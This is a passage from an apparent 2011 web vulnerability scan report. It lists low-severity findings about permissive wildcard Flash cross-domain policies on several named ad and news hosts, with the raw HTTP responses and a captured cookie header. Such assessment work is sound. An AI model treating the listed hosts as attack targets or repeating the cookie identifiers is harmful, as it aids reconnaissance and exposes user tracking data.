Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 7414
Content-Type: text/xml
Last-Modified: Fri, 22 Jul 2011 01:14:52 GMT
Accept-Ranges: bytes
ETag: "90277ac2c48cc1:55f"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:03:00 GMT

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*" secure="true" />
<allow-access-from domain="*.espn.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="profiles.sportsnation.espn.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="profiles.staging.espnfp.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.adsatt.espn.starwave.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.static.espn.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.abclocal.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.corp.espn3.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.espncdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="m.uk.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.arn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.edgefcs.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="clearspring.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.clearspring.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.espnmediaflo.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host-a.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host-d.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host.staging.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.l4b3l.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wknewyork.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wknyc.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.yournbadestination.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.nba.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="hive.cachefly.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="espn.nanogaming.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dolimg.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.yieldmanager.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.akqa.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.designbloxlive.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="ds.serving-sys.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.arndev.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="nascar.blitzagency.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.abc.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.vml.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vmltest.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vmldev.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vmlstage.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.collegegameday.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="dev.sarkissianmason.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.streamtheworld.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adsfac.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.corp.dig.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.google.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.youtube.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="a.abc.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.client-projects.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="173.45.231.98" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="abcpreview.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="abc.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theview.pseudosisu.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theview.tv" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="redinter.vo.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.soapnet.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="sn.soapnet.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="jayski.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.eyewonder.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.squarewave.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="wpc.0C74.edgecastcdn.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="http://www.heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="http://heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="votecollector.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.espndb.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.foxtel.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false" />
...[SNIP]...
<allow-access-from domain="test.demandsport.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="espn.demandsport.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="*.powervideosuite.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gotuit.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cars.triggerla.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.innovid.com" secure="false" />
...[SNIP]...

5.123. http://ads.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adsonar.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:04 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=563
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

5.124. http://ads.dotomi.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.dotomi.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.dotomi.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 27 Mar 2009 14:05:18 GMT
ETag: "3001a18c-a1-4661a38fb0380"
Accept-Ranges: bytes
Content-Length: 161
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP"
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:49:07 GMT
Connection: close

<?xml version="1.0"?>
<!-- Allow access from other dotomi domains -->
<cross-domain-policy>
<allow-access-from domain="*.dotomi.com" />
</cross-domain-policy>

5.125. http://ads.tw.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.tw.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.tw.adsonar.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:03 GMT
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"
Accept-Ranges: bytes
Content-Length: 2621
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=150, max=888
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...

5.126. http://adsatt.abc.starwave.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adsatt.abc.starwave.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Fri, 22 Jul 2011 01:14:52 GMT
Accept-Ranges: bytes
ETag: "90277ac2c48cc1:0"
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 7414
Cache-Control: max-age=3266
Date: Sat, 17 Sep 2011 01:02:46 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-http-request-headers-from domain="*" headers="*" secure="true" />
<allow-access-from domain="*.espn.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="profiles.sportsnation.espn.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="profiles.staging.espnfp.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.adsatt.espn.starwave.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.static.espn.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.disney.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.abclocal.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.corp.espn3.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.espncdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="m.uk.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.fr.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.se.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="m.de.2mdn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.arn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.edgefcs.net" secure="false" to-ports="*" />
...[SNIP]...
<allow-access-from domain="clearspring.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.clearspring.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.espnmediaflo.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host-a.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host-d.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="host.staging.oddcast.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.l4b3l.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wknewyork.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.wknyc.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.yournbadestination.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.nba.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="hive.cachefly.net" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="espn.nanogaming.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.dolimg.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.yieldmanager.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.akqa.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.designbloxlive.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="ds.serving-sys.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.arndev.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="nascar.blitzagency.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.abc.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.vml.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vmltest.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vmldev.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.vmlstage.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.collegegameday.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="dev.sarkissianmason.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.streamtheworld.com" secure="true" to-ports="*" />
...[SNIP]...
<allow-access-from domain="*.adsfac.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.corp.dig.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.google.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.youtube.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="a.abc.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.client-projects.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="173.45.231.98" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="abcpreview.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="abc.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theview.pseudosisu.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theview.tv" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="redinter.vo.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.soapnet.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="sn.soapnet.go.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="jayski.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.eyewonder.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.squarewave.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="wpc.0C74.edgecastcdn.net" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="http://www.heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="http://heavenspotdev.com" secure="true" />
...[SNIP]...
<allow-access-from domain="votecollector.go.com" to-ports="*" secure="true" />
...[SNIP]...
<allow-access-from domain="*.espndb.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.foxtel.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="*.unicast.com" secure="false" />
...[SNIP]...
<allow-access-from domain="test.demandsport.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="espn.demandsport.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="*.powervideosuite.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.gotuit.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cars.triggerla.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.innovid.com" secure="false" />
...[SNIP]...

5.127. http://bh.heraldinteractive.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bh.heraldinteractive.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:08 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
Last-Modified: Thu, 25 Aug 2011 16:03:12 GMT
Accept-Ranges: bytes
Content-Length: 335
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bostonherald.com" />
<allow-access-from domain="*.heraldinteractive.com" />
<allow-access-from domain="*.brightcove.com" />
...[SNIP]...

5.128. http://bostonherald.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bostonherald.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:27 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 16:03:12 GMT
Accept-Ranges: bytes
Content-Length: 335
Content-Type: application/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bostonherald.com" />
<allow-access-from domain="*.heraldinteractive.com" />
<allow-access-from domain="*.brightcove.com" />
...[SNIP]...

5.129. http://bostonheraldnie.newspaperdirect.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://bostonheraldnie.newspaperdirect.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

